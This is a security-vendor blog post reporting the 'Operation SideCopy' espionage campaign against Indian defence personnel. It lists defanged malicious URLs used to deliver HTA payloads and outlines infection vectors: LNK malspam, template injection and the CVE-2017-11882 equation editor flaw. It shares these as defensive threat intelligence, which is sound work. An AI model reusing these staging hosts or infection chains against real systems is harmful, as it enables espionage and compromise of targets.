• News
  • Security
  • Products
  • About Seqrite
Blogs on Information Technology, Network & Cybersecurity | Seqrite Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  APT • Cybersecurity  /  Operation SideCopy!
Operation SideCopy!
23 September 2020

Operation SideCopy!

Written by Kalpesh Mantri
Kalpesh Mantri
APT, Cybersecurity
4
Estimated reading time: 3 minutes

An insight into Transparent Tribe’s sub-division which has been incorrectly attributed for years.

Introduction

Quick Heal’s threat intelligence team recently uncovered evidence of an advanced persistent threat (APT) against Indian defence forces. Our analysis shows that many old campaigns and attack in the past one year relate to ‘Operation SideCopy’ by common IOCs.

Key Findings

  • Operation SideCopy is active from early 2019, till date.
  • This cyber-operation has been only targeting Indian defence forces and armed forces personnel.
  • Malware modules seen are constantly under development and updated modules are released after a reconnaissance of victim data.
  • Actors are keeping track of malware detections and updating modules when detected by AV.
  • Almost all CnC belongs to Contabo GmbH and server names are similar to machine names found in the Transparent Tribe report.
  • This threat actor is misleading the security community by copying TTPs that point at Sidewinder APT group.
  • We suspect this threat actor has links with Transparent Tribe APT group.

Summary:

A few months ago, Quick Heal’s Next-Gen Behavioural Detection system alerted on a few processes executing HTA from some non-reputed websites.

We have made a list of URLs, connected from mshta.exe, across multiple customers:

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Armed-Forces-Spl-Allowance-Order/html/

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Defence-Production-Policy-2020/html/

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Images/8534

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/IncidentReport/html/

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/ParaMil-Forces-Spl-Allowance-Order/html/

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Req-Data/html

hxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Sheet_Roll/html

hxxps://demo[.]smart-school[.]in/uploads/staff_documents/9/Sheet_Roll/html

hxxps://demo[.]smart-school[.]in/uploads/student_documents/12/css/

hxxps://drivetoshare[.]com/mod[.]gov[.]in_dod_sites_default_files_Revisedrates/html

 

The highlighted ones were sent to targets across Indian defence units and armed forces individuals.

We started tracking this campaign as it was targeting critical Indian organizations.

Traces of this operation can be tracked from early 2019 till date. Till now, we have observed 3 infection chain process.

Initial infection vector in two of the chains was LNK file, that came from a malspam. But in one case, we saw attackers making use of template injection attack and equation editor vulnerability (CVE-2017-11882) as the initial infection vector. Though the initial infection vector is different in the third case, the final payload is similar to the first two chains.

Below images will provide an overview of malware infection in victim machines.

Infection Chain – Version 1:

Infection Chain – Version 1

Infection Chain – Version 2:

Infection Chain – Version 2:

Infection Chain – Version 3:

Infection Chain – Version 3:

 

We have provided an in-depth analysis of each of this module in our latest report which can be found here.

The background and analysis in this paper provide complete forensic and useful details of our current thinking on the use of malware in this operation. We have provided all factors that lead to our attribution.

Subject matter experts:

Kalpesh Mantri, Principal Security Researcher

Pawan Chaudhari, Threat Research Scientist

Goutam Tripathy, Senior Security Researcher

 Previous PostCould you be blindsided when your CEO emails you?
Next Post  The return of the Emotet as the world unlocks!
Kalpesh Mantri

About Kalpesh Mantri

Kalpesh Mantri is currently working as a Principal Security Researcher with Quick Heal Labs. He is currently working on hunting APTs and telemetry...

Articles by Kalpesh Mantri »

Related Posts

  • Explained: What is Web3.0 and Why Does it Matter?

    April 8, 2022
  • Metaverse and the Cybersecurity: Evolving Security into the Latest Digital Universe

    March 29, 2022
  • Advisory on Russia-Ukraine Conflict-Related Cyberattacks

    March 15, 2022

4 Comments

Leave a Reply.Your email address will not be published.
Cancel reply

CAPTCHA Image
Refresh Image

  1. Pingback: Researchers Uncover Cyber Espionage Operation Aimed At Indian Army - IT LinesIT Lines
  2. Pingback: Researchers Uncover Cyber Espionage Operation Aimed At Indian Army – Cyber Briefs
  3. Pingback: Researchers Uncover Cyber Espionage Operation Aimed At Indian Army - Cyber Security
  4. Pingback: Researchers Uncover Cyber Espionage Operation Aimed At Indian Army – Auto Translate News
Popular Posts
  • 5 Security measures you should take to protect your organization’s network 5 Security measures you should take to protect your organization’s network August 11, 2017
  • Benefits of having Intrusion Prevention/Detection System in your enterprise Benefits of having Intrusion Prevention/Detection System in your enterprise February 15, 2018
  • Seqrite announces SHA-1 deprecation for its products Seqrite announces SHA-1 deprecation for its products May 27, 2021
Featured Authors
  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director and Chief Technology Officer of...

    Read more..
  • Jayesh Kulkarni
    Jayesh Kulkarni

    Jayesh is working as a Security Researcher for a couple of years. He likes to...

    Read more..
Stay Updated!
Topics
apt (11) BYOD (10) COVID-19 (10) Cyber-attack (32) cyber-attacks (56) cyberattacks (12) Cybersecurity (300) cyber security (26) Cyber threat (29) cyber threats (44) Data (11) data breach (50) data breaches (27) data loss (28) data loss prevention (33) data protection (21) data security (13) DLP (49) Encryption (16) endpoint security (103) Enterprise security (15) EPS (10) Exploit (12) firewall (11) IoT (10) malware (64) malware attack (23) malware attacks (12) MDM (25) Microsoft (13) Network security (18) Patch Management (12) phishing (18) Ransomware (60) ransomware attack (29) ransomware attacks (30) ransomware protection (12) security (10) Seqrite (26) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) UTM (34) Vulnerability (12) windows (11)
Products
  • HawkkHunt
  • HawkkEye
  • HawkkEye Endpoint Security Cloud
  • HawkkEye mSuite
  • HawkkEye Workspace
  • Endpoint Security (EPS)
  • Unified Threat Management
  • Antivirus for Server
  • Antivirus for Linux
Resources
  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies
About Us
  • Company Overview
  • Leadership
  • Why choose SEQRITE?
  • Awards & Certifications
  • Newsroom
Archives
  • By Date
  • By Category

© 2022 Quick Heal Technologies Ltd. Cookie Policies Privacy Policies

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website.
By browsing this website, you agree to our cookie policy.